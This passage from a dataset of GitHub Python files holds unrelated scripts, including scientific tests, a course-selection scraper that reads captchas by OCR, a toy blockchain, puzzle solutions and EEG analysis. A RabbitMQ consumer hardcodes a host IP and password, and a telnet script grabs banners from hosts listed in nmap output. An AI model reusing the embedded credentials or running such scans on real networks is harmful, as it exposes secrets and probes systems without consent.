isinstance(vec, cls)\n middle_part = vec[3:6]\n assert middle_part.shape == (3,)\n assert isinstance(middle_part, cls)\n\n\ndef test_vector_copying():\n for cls in VECTOR_CLASSES:\n vec = cls.create(np.random.random_sample((12,))) # type: ignore\n assert isinstance(vec, cls)\n vec_copy = vec.copy()\n assert vec_copy is not vec\n assert np.array_equal(vec, vec_copy)\n assert isinstance(vec_copy, cls)\n\n\ndef test_excplicit_vector_construction():\n for cls in VECTOR_CLASSES:\n vec = cls(shape=(4,), dtype=np.float64)\n assert isinstance(vec, cls)\n assert vec.shape == (4,)\n assert vec.dtype == np.float64\n\n\ndef test_ufunc_on_vector():\n data = np.array([0.0, 0.25, 0.50])\n expected = np.sin(data)\n for cls in VECTOR_CLASSES:\n vec = cls.create(data) # 
type: ignore\n        result = np.sin(vec)\n        assert isinstance(result, cls)\n        assert np.array_equal(result, expected)\n\n\ndef test_vector_residuals():\n    theory = stat.TheoryVector.from_list([1.0, 2.0, 3.0])\n    data = stat.DataVector.from_list([1.1, 2.1, 3.1])\n    difference = stat.residuals(data, theory)\n    assert isinstance(difference, np.ndarray)\n    for cls in VECTOR_CLASSES:\n        assert not isinstance(difference, cls)\n\n\ndef test_guarded_statistic_read_only_once(\n    sacc_data_for_trivial_stat: sacc.Sacc, trivial_stats: List[stat.TrivialStatistic]\n):\n    gs = stat.GuardedStatistic(trivial_stats.pop())\n    assert not gs.statistic.ready\n    gs.read(sacc_data_for_trivial_stat)\n    assert gs.statistic.ready\n    with pytest.raises(\n        RuntimeError, match=\"Firecrown has called read twice on a GuardedStatistic\"\n    ):\n        gs.read(sacc_data_for_trivial_stat)\n\n\ndef test_guarded_statistic_get_data_before_read(trivial_stats):\n    s = trivial_stats.pop()\n    with pytest.raises(\n        stat.StatisticUnreadError,\n        match=f\"The statistic {s} was used for \"\n        f\"calculation before `read` was called.\",\n    ):\n        g = stat.GuardedStatistic(s)\n        _ = g.get_data_vector()\n","repo_name":"LSSTDESC/firecrown","sub_path":"tests/likelihood/gauss_family/statistic/test_statistic.py","file_name":"test_statistic.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"37"} +{"seq_id":"19107251205","text":"# -*- coding: UTF-8 -*-\n\n# filename : coursesGetAndGuess.py\n# author by : SliverYou\n\nimport os\nimport re\nfrom functools import partial\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom prettytable import PrettyTable as pt\n\nfrom tools import s, headers, enter, load_cookies, download_idcode, image_read, Person\nfrom decorate import judge\n\nbs = partial(BeautifulSoup, features='lxml')\n\nhidXNXQ = '2017-20182' # If it is currently the 1st semester of the 2017-2018 academic year, the courses being picked are for the next semester, so this should be the 2nd semester, i.e. '2017-20182'\n                       # If it is currently the 2nd semester of 2017-2018, the courses being picked are for the next semester of the next academic year, so it should be '2018-20191', and so on\n\n\ndef look_courses(html):\n    '''\n    Print the currently selected public elective courses.\n    html: the HTML string of the course-selection page.\n    '''\n    table = bs(html).find_all('table', class_='datelist')[1]\n    table_has = None\n\n    for i, tr in enumerate(table.find_all('tr')):\n        td = tr.find_all('td')\n        L = [ x.get_text() for x in td ]\n        if i == 0:\n            table_has = pt(['课程编号'] + L[:-1])\n        else:\n            table_has.add_row([i-1] + L[:-1])\n\n    print('已选课程如下所示:')\n    print(table_has)\n\n\ndef get_select_page(number, nameEncoded):\n    '''\n    Open the course-selection page and return the current Session object and Response object.\n    - number: student ID.\n    - nameEncoded: the encoded name.\n    '''\n    load_cookies()\n\n    r = enter('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113', prompt=False)\n\n    data = {\n        '__EVENTTARGET': 'ddl_kcgs',\n        '__EVENTARGUMENT': '',\n        '__LASTFOCUS': '',\n        '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n        '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n        'ddl_kcxz': '',\t\n        'ddl_ywyl': '有'.encode('gb2312'),\n        'ddl_kcgs': '',\t\n        'ddl_xqbs': '1',\n        'ddl_sksj': '',\t\n        'TextBox1': '',\n        'Button2': '确定'.encode('gb2312'),\t\n        'txtYz': '',\t\n        'hidXNXQ': hidXNXQ\n    }\n\n    r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers) \n    return s, r\n\n\ndef go_to_select(xk, s, r):\n    '''\n    Submit the form to complete the course selection.\n    - xk: course-selection ID.\n    - s: Session object.\n    - r: Response object.\n\n    - return: s, r, result: the Session object and Response object after submitting the form, and the captcha verification result.\n    '''\n    number = Person.number\n    nameEncoded = Person.getNameEncoded('utf8')\n\n    download_idcode('http://jxgl.hdu.edu.cn/CheckCode.aspx') # download the captcha image\n    idcode = image_read() # returns the captcha recognition result\n    print(\"识别结果为:\", idcode, '\n',sep='')\n\n    data = {\n        '__EVENTTARGET': '',\n        '__EVENTARGUMENT': '',\n        '__LASTFOCUS': '',\n        '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n        '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n        'ddl_kcxz': '',\t\n        'ddl_ywyl': '有'.encode('gb2312'),\n        'ddl_kcgs': '',\t\n        'ddl_xqbs': '1',\n        'ddl_sksj': '',\t\n        'TextBox1': '',\n        xk: 'on',\t\n        'txtYz': idcode,\t\n        'Button1': ' 提交 '.encode('gb2312'),\n        'hidXNXQ': hidXNXQ\n    }\n\n    s.cookies.load('cookies.txt', ignore_discard=True, ignore_expires=True)\n    r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers)\n\n    try:\n        result = re.search(\".*?alert\\('(.*?)!!.*?\", r.text[:50], re.S).group(1) # check for an alert message; a match means captcha verification failed\n    except AttributeError:\n        # re.search failed, which means captcha verification succeeded\n        result = 'Yes'\n        print('验证码校验成功!\n')\n\n    return s, r, result\n\n\ndef select_courses():\n    '''\n    Open the course-selection page and perform the course-selection workflow.\n    '''\n    number = Person.number\n    nameEncoded = Person.getNameEncoded('utf8')\n    \n    print(\"正在进入选课页面...\") \n    s, r = get_select_page(number, nameEncoded)\n    print(\"开始爬取选课信息...\") \n\n    table = pt([\"编号\", \"课程名称\", \"课程代码\", \"教师姓名\", \"上课时间\", \"学分\", \"起始结束周\", \"容量\", \"余量\", \"课程归属\", \"课程性质\"])\n    i = 0\n\n    for tr in bs(r.text).find_all('tr')[1:]:\n        td = tr.find_all('td')\n        L = [ x.get_text() for x in td ]\n        l = L[2:6] + [L[7]] + L[9:14]\n\n        if '退选' in l:\n            # Rows containing the withdraw keyword are already-selected courses and must not go into the selectable list.\n            break\n\n        table.add_row([i] + l) # record the index and the info of the selectable course\n        i = i + 1\n\n    print('所有可选课程如下所示:')\n    print(table)\n\n    while True:\n        print('\n*#*#*#*#*#*#*#*#*\n')\n        print('  1.按课程编号选课')\n        print('  2.按课程名称选课')\n        print('  3.查看已选课程')\n        print('  4.退选已选课程')\n        print('  5.退出')\n        print('\n*#*#*#*#*#*#*#*#*\n')\n\n        choice = input('请输入你的选择(输入数字即可):')\n        print()\n\n        choice = judge(choice, 5) # validate the input format to ensure a correctly formatted value is returned\n\n        if choice == 1:\n            num = input('请输入将选课程的编号:')\n\n            while num.isdigit() is False:\n                print('格式输入错误!请输入正确的数字!') \n                num = input('请再次输入将选课程的编号:')\n\n            num = int(num)\n\n            # Inspecting the submitted form shows that the value to post is the displayed index plus 2, so add 2 to the index before submitting\n            if 0 <= num < 8:\n                xk = 'kcmcGrid$ctl0{}$xk'.format(num+2)\n            elif 8 <= num < i:\n                xk = 'kcmcGrid$ctl{}$xk'.format(num+2)\n            s, r, result = go_to_select(xk, s, r)\n\n            while result == '验证码不正确':\n                print('验证码校验失败!正在重新提交...')\n                s, r = get_select_page(number, nameEncoded)\n                s, r, result = go_to_select(xk, s, r)\n\n            print('φ(≧ω≦*)♪选课中...')\n            print('......')\n            print('成功完成选课٩(๑>◡<๑)۶!\n')\n            look_courses(r.text)\n            s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n            continue\n\n        elif choice == 2:\n            # limited time, this feature has not been implemented yet\n            break\n\n        elif choice == 3:\n            look_courses(r.text)\n            s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n            continue\n\n        elif choice == 4:\n            print('正在进行退课操作!请谨慎操作!(可按q退出退课操作)')\n            num = input('请输入需要退选的课程编号:')\n\n            if num == 'q':\n                continue\n\n            num = input('请再次确认需要退选的课程编号:') # withdrawing needs caution, so the confirmation is repeated twice\n            \n            while num.isdigit() is False:\n                print('格式输入错误!请输入正确的数字!') \n                num = input('请再次输入需要退选课程的编号:')\n\n            num = int(num)\n\n            if 0 <= num < 8:\n                tk = 'DataGrid2$ctl0{}$ctl00'.format(num+2)\n            elif 8 <= num < i:\n                tk = 'DataGrid2$ctl{}$ctl00'.format(num+2)\n\n            data = {\n                '__EVENTTARGET': tk,\n                '__EVENTARGUMENT': '',\n                '__LASTFOCUS': '',\n                '__VIEWSTATE': bs(r.text).select('input[name=\"__VIEWSTATE\"]')[0]['value'],\n                '__EVENTVALIDATION': bs(r.text).select('input[name=\"__EVENTVALIDATION\"]')[0]['value'],\n                'ddl_kcxz': '',\t\n                'ddl_ywyl': '有'.encode('gb2312'),\n                'ddl_kcgs': '',\t\n                'ddl_xqbs': '1',\n                'ddl_sksj': '',\t\n                'TextBox1': '',\t\n                'txtYz': '',\t\n                'hidXNXQ': hidXNXQ\n            }\n\n            r = s.post('http://jxgl.hdu.edu.cn/xf_xsqxxxk.aspx?xh={0}&xm={1}&gnmkdm=N121113'.format(number, nameEncoded), data=data, headers=headers)\n\n            print('\nφ(≧ω≦*)♪退课中...')\n            print('......')\n            print('成功完成退课٩(๑>◡<๑)۶!\n')\n\n            look_courses(r.text)\n            s.cookies.save('cookies.txt', ignore_discard=True, ignore_expires=True)\n            continue\n\n        elif choice == 5:\n            break","repo_name":"sliveryou/hdu-spider","sub_path":"selectCourses.py","file_name":"selectCourses.py","file_ext":"py","file_size_in_byte":8701,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41360380955","text":"import uuid\nimport time\n\nfrom backend.wallet.wallet import Wallet\n\nclass Transaction:\n    \"\"\"\n    Document of an exchange in currency from a sender to one or more recipients.\n    \"\"\"\n    def __init__(\n        self,\n        sender_wallet = None,\n        recipient = None,\n        amount = None,\n        id = None,\n        output = None,\n        input = None\n    ): # giving the parameters a None default means we don't have to pass a value\n    # for every parameter when we call the function\n        self.id = id or str(uuid.uuid4())[0:8] # if a transaction id is provided in the parameters above\n        # then we can use it directly, otherwise we have to generate a new one\n        self.output = output or self.create_output(\n            sender_wallet,\n            recipient,\n            amount\n        )\n        self.input = input or self.create_input(sender_wallet, self.output)\n    \n    def create_output(self, sender_wallet, recipient, amount):\n        \"\"\"\n        Structure the output data for the transaction.\n        How much the sender wants to send and to which address.\n        \"\"\"\n        if amount > sender_wallet.balance:\n            raise Exception('Amount exceeds balance')\n\n        output = {}\n        output[recipient] = amount\n        output[sender_wallet.address] = sender_wallet.balance - amount # this will return the \n        # balance after the sender sends money to the recipient\n\n        return output\n\n    def create_input(self, sender_wallet, output):\n        \"\"\"\n        Structure the input data for the transaction.\n        Sign the transaction and include the sender's public key and address.\n        It's the sender's information.\n        \"\"\"\n        return {\n            'timestamp': time.time_ns(),\n            'amount': sender_wallet.balance,\n            'address': sender_wallet.address,\n            'public_key': sender_wallet.public_key,\n            'signature': sender_wallet.sign(output) # make a signature on behalf of the sender wallet;\n            # the signature should be generated based on the output data \n        }\n\n    def update(self, sender_wallet, recipient, amount):\n        \"\"\"\n        Update the transaction with an existing or new recipient.\n        \"\"\"\n        if amount > self.output[sender_wallet.address]:\n            raise Exception('Amount exceeds balance')\n\n        if recipient in self.output:\n            self.output[recipient] = self.output[recipient] + amount \n            # because we are sending more to this existing recipient\n        else: # new recipient\n            self.output[recipient] = amount\n\n        self.output[sender_wallet.address] = self.output[sender_wallet.address] - amount\n\n        self.input = self.create_input(sender_wallet, self.output)\n        # to generate a new signature, we recreate the input rather than update the old input\n\n    def to_json(self):\n        \"\"\"\n        Serialize the transaction.\n        \"\"\"\n        return self.__dict__\n\n    @staticmethod\n    def from_json(transaction_json):\n        
\"\"\"\n Deserialize a transaction json representation back into a Transaction instance.\n \"\"\"\n return Transaction(**transaction_json) # because we pass in the same exact arguments of transaction_json into this function\n # which is the same as:\n # return Transaction(\n # id = transaction_json['id'],\n # output = transaction_json['output'],\n # input = transaction_json['input']\n #)\n\n @staticmethod\n def is_valid_transaction(transaction):\n \"\"\"\n Validate a transaction\n Raise an exception for invalid transactions.\n \"\"\"\n output_total = sum(transaction.output.values())\n\n if transaction.input['amount'] != output_total:\n raise Exception('Invalid transaction output values')\n\n if not Wallet.verify(\n transaction.input['public_key'],\n transaction.output,\n transaction.input['signature']\n ): # which means the transaction is invalid\n raise Exception('Invalid signature')\n\ndef main():\n transaction = Transaction(Wallet(), 'recipient', 15)\n # which means the sender sends 15 to the recipient\n print(f'transaction.__dict__: {transaction.__dict__}')\n\n transaction_json = transaction.to_json()\n restored_transaction = Transaction.from_json(transaction_json)\n print(f'restored_transaction.__dict__: {restored_transaction.__dict__}')\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"TwylaWeiyuTang/Blockchain","sub_path":"backend/wallet/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25668814785","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1'\n\nsetup(name='s3dl',\n version=version,\n description=\"Makes downloading s3 files easier\",\n long_description=\"\",\n classifiers=[], # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n keywords='',\n author='Will Gardner',\n author_email='will.gardner@couchbase.com',\n url='',\n license='MIT',\n packages=['s3dl'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'boto3>1.3.0'\n ],\n entry_points={\n \"console_scripts\": [\n \"s3dl=s3dl.s3dl:main\",\n ],\n })\n","repo_name":"couchbaselabs/s3dl","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"42087334692","text":"def powmod(a,b,m):\n result = 1\n while b > 0:\n if b % 2 != 0:\n result = (result * a) % m\n b //= 2\n a = (a * a) % m\n\n return result\n\ndef mr(n,a):\n r = 0\n d = n-1\n while (d%2 == 0):\n r += 1\n d = d // 2\n x = powmod(a,d,n)\n if x == 1 or x == n-1:\n return True\n for i in range(0,r-1):\n x = powmod(x,2,n)\n if x == n-1:\n return True\n return False\n\nimport sys\nans = 0\nm = int(sys.stdin.readline())\nfor i in range(m):\n k = int(sys.stdin.readline())\n check = 0\n for i in [2, 3,5,7,11]:\n if mr(2*k+1,i) == False:\n break\n else:\n check += 1\n if check == 5:\n ans += 1\nprint(ans)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution640.py","file_name":"solution640.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26284214088","text":"class Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n row, col = 0, 0\n string_matrix = {}\n char_iter = 0\n for i in range(0, numRows):\n 
string_matrix[i] = {}\n\n        while char_iter < len(s):\n            row = 0\n            while row < numRows and char_iter < len(s):\n                # print \"about to print char {} len {}\".format(char_iter, len(s))\n                # print \"char {}\".format(s[char_iter])\n                string_matrix[row][col] = s[char_iter]\n                char_iter += 1\n                if row + 1 == numRows:\n                    break\n                row += 1\n\n            row -= 1\n            col += 1\n            while row >= 1 and char_iter < len(s):\n                string_matrix[row][col] = s[char_iter]\n                col += 1\n                char_iter += 1\n                if row - 1 < 1:\n                    break\n                row -= 1\n\n        print_str = \"\"\n        for row in sorted(string_matrix.keys()):\n            for col in sorted(string_matrix[row].keys()):\n                print_str += string_matrix[row][col]\n        return print_str\n","repo_name":"humanalgorithm/leetcode_solutions","sub_path":"zigzag-conversion/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18958071787","text":"import pika\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\n    host='10.176.139.8',\n    port=5672,\n    virtual_host=\"/devops\",\n    credentials=pika.PlainCredentials(\"devops\", \"q9wCFiEti7UuxYFPr3q0Xw\")\n))\nchannel = connection.channel()\n\n\ndef callback(ch, method, properties, body):\n    print(\" [x] Received %r\" % body)\n\n\n# channel.basic_qos(prefetch_count=1)\nchannel.basic_consume('world', callback, False)\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"bobowang2017/python_study","sub_path":"rabbitmq/helloworld/receive2.py","file_name":"receive2.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"75192744426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 1 12:02:43 2021\n\n@author: claire.dussard\n\"\"\"\nimport os \nimport seaborn as sns\nimport pathlib\nimport mne\n# requires having run handleData_subject.py and load_savedData beforehand\nimport numpy as np \n# move into the lustre data directories\nos.chdir(\"../../../../..\")\nlustre_data_dir = \"cenir/analyse/meeg/BETAPARK/_RAW_DATA\"\nlustre_path = pathlib.Path(lustre_data_dir)\nos.chdir(lustre_path)\n\nsujetsPb = [11]\nfor sujetpb in sujetsPb:\n    allSujetsDispo.remove(sujetpb)\n\nessaisMainRest = [\"9-2\" for i in range(25)]\nessaisMainIllusionRest = [\"10-2\" for i in range(25)]\nliste_rawPathMain = createListeCheminsSignaux(essaisMainRest,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale)\nliste_rawPathMainIllusion = createListeCheminsSignaux(essaisMainIllusionRest,listeNumSujetsFinale, allSujetsDispo,SujetsPbNomFichiers,listeDatesFinale)\n\nevent_id_mainIllusion = {'Essai_mainIllusion':3}\nevent_id_main={'Essai_main':3} \n\n\n#=================================================================================================================================\n            #SUBJECT-AVERAGED EPOCHS METHOD\n#=================================================================================================================================\n\nnbSujets = 24\nSujetsDejaTraites = 0\nrawPath_main_sujets = liste_rawPathMain[SujetsDejaTraites:SujetsDejaTraites+nbSujets]\nrawPath_mainIllusion_sujets = liste_rawPathMainIllusion[SujetsDejaTraites:SujetsDejaTraites+nbSujets]\n\n\nlisteEpochs_main,listeICA_main,listeEpochs_mainIllusion,listeICA_mainIllusion = all_conditions_analysis_NFBRest(allSujetsDispo,rawPath_main_sujets,rawPath_mainIllusion_sujets,\n                                                                                         event_id_main,event_id_mainIllusion,\n                                                                                         0.1,1,90,[50,100],'Fz')\n\n# subjects 15 and 16 to be discarded / check the raw data: waves everywhere\n\nsaveEpochsAfterICA(listeEpochs_main,rawPath_main_sujets)\nsave_ICA_files(listeICA_main,rawPath_main_sujets)\nsaveEpochsAfterICA(listeEpochs_mainIllusion,rawPath_mainIllusion_sujets)\nsave_ICA_files(listeICA_mainIllusion,rawPath_mainIllusion_sujets)\n\nEpochDataMain = load_data_postICA(rawPath_main_sujets,\"\")\n\nEpochDataMainIllusion = load_data_postICA(rawPath_mainIllusion_sujets,\"\")\n\n#===================set montage===IMPORTANT!!!!=======================\nmontageEasyCap = mne.channels.make_standard_montage('easycap-M1')\nfor epochs in EpochDataMain:\n    if epochs!=None:\n        epochs.set_montage(montageEasyCap)\nfor epochs in EpochDataMainIllusion:\n    if epochs!=None:\n        epochs.set_montage(montageEasyCap)\n    \n    \nliste_power_main = plotSave_power_topo_cond(EpochDataMain,rawPath_main_sujets,3,85,\"NFBrest_main\",250.,1.5,25.5)#needs to have set up the electrode montage before\nliste_power_mainIllusion = plotSave_power_topo_cond(EpochDataMainIllusion,rawPath_mainIllusion_sujets,3,85,\"NFBrest_mainIllusion\",250.,1.5,25.5)\n\nsave_tfr_data(liste_power_main,rawPath_main_sujets,\"\")\n\nsave_tfr_data(liste_power_mainIllusion,rawPath_mainIllusion_sujets,\"\")\n\n#===================apply a baseline by subject before grand averaging=========================\n\ndureePreBaseline = 4\ndureePreBaseline = - dureePreBaseline\ndureeBaseline = 3.0\nvaleurPostBaseline = dureePreBaseline + dureeBaseline\n\nbaseline = (dureePreBaseline, valeurPostBaseline)\nfor tfr in liste_power_mainIllusion:\n    tfr.apply_baseline(baseline=baseline, mode='logratio', verbose=None)\n    \nav_power_main_rest = mne.grand_average(liste_power_main,interpolate_bads=True)\nsave_topo_data(av_power_main_rest,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_main\",False,1.5,25.5)\n\nav_power_mainIllusion_rest = mne.grand_average(liste_power_mainIllusion,interpolate_bads=True)\nsave_topo_data(av_power_mainIllusion_rest,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_mainIllusion\",False,1.5,25.5)\n\nav_power_main_rest.save(\"../AV_TFR/all_sujets/main_NFBrest-tfr.h5\",overwrite=True)\nav_power_mainIllusion_rest.save(\"../AV_TFR/all_sujets/mainIllusion_NFBrest-tfr.h5\",overwrite=True)\n#========== compute difference between conditions ========================\navpower_main_moins_mainIllusion = av_power_main_rest - av_power_mainIllusion_rest\n\nsave_topo_data(avpower_main_moins_mainIllusion,dureePreBaseline,valeurPostBaseline,\"all_sujets\",mode,\"NFBrest_main-mainIllusion\",False,1.5,25.5)","repo_name":"cdussard/M2data_analysis","sub_path":"analyse_M2/functions/NFBRest.py","file_name":"NFBRest.py","file_ext":"py","file_size_in_byte":4411,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18352256888","text":"from django.urls import path\nfrom.import views\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    path('Home', views.index, name='index'),\n    path('login_in',views.login_in,name='login_in'),\n    path('Login_Res',views.Login_Res),\n    path('Logout_Window',views.Logout_Window),\n    path('add_customers',views.add_customers),\n    path('customer_view', views.customer_view),\n    path('customers_details', views.customers_details),\n    path('add_lineworkers', views.add_lineworkers),\n    path('lineworkers_details', views.lineworkers_details),\n    path('cus_reg_submit',views.cus_reg_submit),\n    path('line_reg_submit',views.line_reg_submit),\n    
path('Password_window',views.Password_window),\n path('customer_contact', views.customer_contact),\n path('admin_plan_reg',views.admin_plan_reg),\n path('admin_plan_res',views.admin_plan_res),\n path('admin_plan_view', views.admin_plan_view),\n path('admin_plan_update', views.admin_plan_update),\n path('admin_plan_updated_res', views.admin_plan_updated_res),\n path('customer_profile',views.customer_profile),\n path('worker_profile', views.worker_profile),\n path('customer_delete', views.customer_delete),\n path('Dashboard', views.Dashboard),\n path('Admin_page',views.Admin_page),\n path('Admin_oldpswd',views.Admin_oldpswd),\n path('request_form',views.request_form),\n path('requst_res',views.requst_res),\n path('request_submit',views.request_submit),\n path('worker_inbox',views.worker_inbox),\n path('customer_inform',views.customer_inform),\n path('inform_submit',views.inform_submit),\n path('complaints',views.complaints),\n path('worker_plan_view',views.worker_plan_view),\n path('lineworker_page',views.lineworker_page),\n path(\"customer_plan_view\",views.customer_plan_view),\n path('Customer_page',views.lineworker_page),\n path('About',views.About),\n]\n","repo_name":"IsmailAvayil/Fibronet_Assignment","sub_path":"Broadband/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33291992269","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom distutils.core import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nfrom setuptools.command.install_lib import install_lib\nimport subprocess\nfrom sys import platform\n\nroot_dir = os.path.realpath(os.path.abspath(os.path.dirname(__file__)))\nfunchook_dir = os.path.join(root_dir, \"funchook\")\n\n\nclass Build(build_ext):\n def run(self):\n if platform == \"win32\":\n cmake_cmd = \"\"\"\n cmake.exe ..\n cmake.exe --build . 
--config Release\n \"\"\"\n shell = \"cmd\"\n else:\n cmake_cmd = \"\"\"\n cmake -DCMAKE_BUILD_TYPE=Release -DFUNCHOOK_BUILD_TESTS=OFF ..\n make\n \"\"\"\n shell = \"bash\"\n funchook_build_dir = os.path.join(funchook_dir, \"build\")\n if not os.path.exists(funchook_build_dir):\n os.mkdir(funchook_build_dir)\n build_script = \"\"\"\n cd %s\n %s\n \"\"\" % (\n funchook_build_dir,\n cmake_cmd,\n )\n process = subprocess.Popen(shell, stdin=subprocess.PIPE, stdout=sys.stdout)\n out, err = process.communicate(build_script.encode(\"utf-8\"))\n build_ext.run(self)\n if platform == \"win32\":\n return\n\n funchook_name = \"libfunchook.so.1\"\n self.copy_file(os.path.join(funchook_build_dir, funchook_name), os.path.join(root_dir, \"hook\", funchook_name))\n\n\nclass InstallLib(install_lib):\n def run(self):\n install_lib.run(self)\n\n\ndef build_hook_ext():\n platform_args = []\n link_args = []\n extra_compile_args = []\n strict_build_args = []\n runtime_library_dirs = []\n\n if platform == \"win32\":\n libraries = [\"funchook\", \"distorm\"]\n library_dirs = [\n os.path.join(funchook_dir, \"build\", \"Release\"),\n ]\n else:\n libraries = [\"funchook\"]\n runtime_library_dirs = [\"$ORIGIN\"]\n library_dirs = [\n os.path.join(funchook_dir, \"build\"),\n ]\n platform_args = [\"-Wno-cast-function-type\"]\n\n extra_compile_args = [\n \"-Wall\",\n \"-Wextra\",\n \"-Wno-unused-parameter\",\n \"-Wmissing-field-initializers\",\n ]\n extensions = [\n Extension(\n \"hook.fh_hook\",\n [os.path.join(root_dir, \"hook\", \"fh_hook.c\")],\n libraries=libraries,\n include_dirs=[os.path.join(funchook_dir, \"include\"), ],\n library_dirs=library_dirs,\n runtime_library_dirs=runtime_library_dirs,\n extra_compile_args=extra_compile_args + strict_build_args + platform_args,\n extra_link_args=link_args,\n ),\n ]\n s_args = [\"build_ext\", \"-b\", os.path.join(root_dir)]\n setup(name=\"hook\", ext_modules=extensions,\n cmdclass=dict(build_ext=Build, install_lib=InstallLib), script_args=s_args, verbose=True, )\n\n\nif __name__ == '__main__':\n build_hook_ext()\n","repo_name":"liue0izt/str-hook-demo","sub_path":"build_hook_ext.py","file_name":"build_hook_ext.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14064891847","text":"#!/usr/bin/env python\nimport sys,os\nimport subprocess\n# this module requires requests library\nfrom common import *\nimport urllib\nimport telnetlib\nimport time\n\nresult_obj = {}\noutput_path = 'output/'\n\ndef grab_banner(host, **kwargs):\n t = telnetlib.Telnet()\n t.open(host,23,kwargs['timeout'])\n # 3 seconds for waiting before grabing anything\n time.sleep(3)\n message = t.read_until()\n if message is None:\n raise Exception(\"timed out\")\n log_green(message)\n t.close()\n \n\ndef main():\n hosts = grep_hosts(sys.argv[1], GNMAP_TELNET)\n # for each host, we need to perform the following logic\n # 1. test server response, to obtain\n # 1.1 server fingerprinting\n # - we are not re-inventing the wheel here. We just try to grab server header as quick as possible. 
Real fingerprinting kung fu should go to nmap instead\n # 1.2 root / response\n # - try to text2html and screenshot\n # - if forbidden at least show the content\n # 1.3 robots.txt\n # - alert if exists\n # - iterate entries\n # 1.4 dirbusting?\n \"\"\"\n log('test')\n log_green('test_green')\n log_red('test_red')\n log_blue('test_blue')\n log('test_white')\n \"\"\"\n try:\n os.mkdir(output_path)\n except OSError:\n pass\n \n\n options={'timeout':5, 'verify':False}\n for host in hosts:\n log(\"*** HOST %s ***\" % host)\n try:\n grab_banner(host, **options)\n except:\n log_red(\"%s timed out. Skipping to next host\" % host)\n\n\n \n\nif __name__ == \"__main__\":\n if len(sys.argv) != 2:\n usage()\n else:\n main()\n","repo_name":"hkcharles/hackit","sub_path":"scripts/telnet.py","file_name":"telnet.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29664365873","text":"import logging\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup\n\nfrom .. import utils\nfrom ..cache import Cache\n\n__authors__ = [\"zstumgoren\", \"Dilcia19\", \"shallotly\"]\n__tags__ = [\"html\", \"csv\"]\n__source__ = {\n \"name\": \"Virginia Employment Commission\",\n \"url\": \"https://www.vec.virginia.gov/warn-notices\",\n}\n\nlogger = logging.getLogger(__name__)\n\n\ndef scrape(\n data_dir: Path = utils.WARN_DATA_DIR,\n cache_dir: Path = utils.WARN_CACHE_DIR,\n) -> Path:\n \"\"\"\n Scrape data from Virginia.\n\n Keyword arguments:\n data_dir -- the Path were the result will be saved (default WARN_DATA_DIR)\n cache_dir -- the Path where results can be cached (default WARN_CACHE_DIR)\n\n Returns: the Path where the file is written\n \"\"\"\n # Get the WARN page\n url = \"https://www.vec.virginia.gov/warn-notices\"\n r = utils.get_url(url, verify=False)\n html = r.text\n\n # Save it to the cache\n cache = Cache(cache_dir)\n cache.write(\"va/source.html\", html)\n\n # Parse out the CSV download link\n soup = BeautifulSoup(html, \"html.parser\")\n csv_href = 